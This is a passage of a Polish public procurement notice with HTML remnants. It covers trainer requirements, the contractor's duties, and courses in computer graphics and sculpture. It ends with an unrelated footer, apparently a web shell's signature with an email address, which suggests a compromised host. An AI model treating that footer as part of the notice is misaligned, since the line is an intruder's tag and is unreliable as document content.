Zamawiający wymaga aby zajęcia szkoleniowe prowadziła wykwalifikowana kadra dydaktyczna  o kwalifikacjach i doświadczeniach  odpowiednich do prowadzonych kursów i szkoleń. Wykonawca w opracowanych  programach szkolenia powinien wykorzystać standardy kwalifikacji zawodowych . Wykonawca który zostanie wyłoniony w postępowaniu  przedłoży jako załącznik do umowy szkoleniowej plan nauczania/szkolenia zawierający nazwę i zakres szkolenia , czas trwania i sposób organizacji szkolenia, cele szkolenia, opis  treści  szkolenia w zakresie poszczególnych zajęć  edukacyjnych.
Zamawiający zabezpiecza sale wykładowe na realizacje kursów.
Wykonawca jest zobowiązany do
- przekazania każdemu uczestnikowi materiałów szkoleniowych dydaktycznych  niezbędnych do przeprowadzenia szkolenia 
-realizacji Przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umie-jętności, 
-zapewnienia sprzętu niezbędnego do należytej realizacji przedmiotu 
-bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na Zajęciach,
-ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji Przedmiotu zamówienia, nieprzewidzianych w umowie, 
-złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji Przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych,1 egzemplarza materiałów szkoleniowych lub kserokopii, zaświadczeń/certyfikatów ukończenia Kursu lub  kserokopii w/w zaświadczeń/ certyfikatów, kserokopii ubezpieczenia NNW
Nazwa zadania: 
Kurs fotografii i grafiki komputerowej dla zaawansowanych
Opis przedmiotu zamówienia           
Uzasadnienie: Zdobycie niezbędnej wiedzy teoretycznej i praktycznych umiejętności w zakresie: 
1) przygotowanie do pracy z zawodzie grafika komputerowego
2)zdobycie wiedzy z zakresu przygotowywania projektów graficznych przeznaczonych do druku offsetowego, sitodruku, druku cyfrowego i ekspozycji ekranowej,]
3) zdobycie praktycznej umiejętności wykonywania animacji tekstu i obrazu oraz projektów: wizytówek, papieru firmowego, etykiet, logo itp.
4) poznanie obsługi programów Corel Draw, Photoshop, Macromedia Flash
1 grupa 15 osób (150 godzin)


Nazwa zadania: 
Kurs Rzeźby i Działań Przestrzennych
Opis przedmiotu zamówienia           
Zdobycie niezbędnej wiedzy teoretycznej i praktycznych umiejętności kreowania obiektu bądź aranżacji przestrzennej z wykorzy-staniem różnych technik rzeźbiarskich. Program kursu będzie obejmował: płaskorzeźba i rzeźba półnowymiarowa, szkic rzeźbiarski, budowanie kompozycji, ustalanie proporcji, studium martwej natury, anatomia - postać, portret, ćwiczenia z modelami modelkami - studium z natury, budowanie kompozycji z wyobraźni, kreowanie indywidualnego stylu, niezbędna wiedza z zakresu podstaw technik rzeźbiarskich (modelowanie w glinie. plastelinie, modelinie, papier-mâché,  odlewy negatywowe i pozytywowe, budowanie konstrukcji rzeźbiarskich, korzystanie z narzędzi)
1 grupa 12 osób (80 godzin).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.21.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.09.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com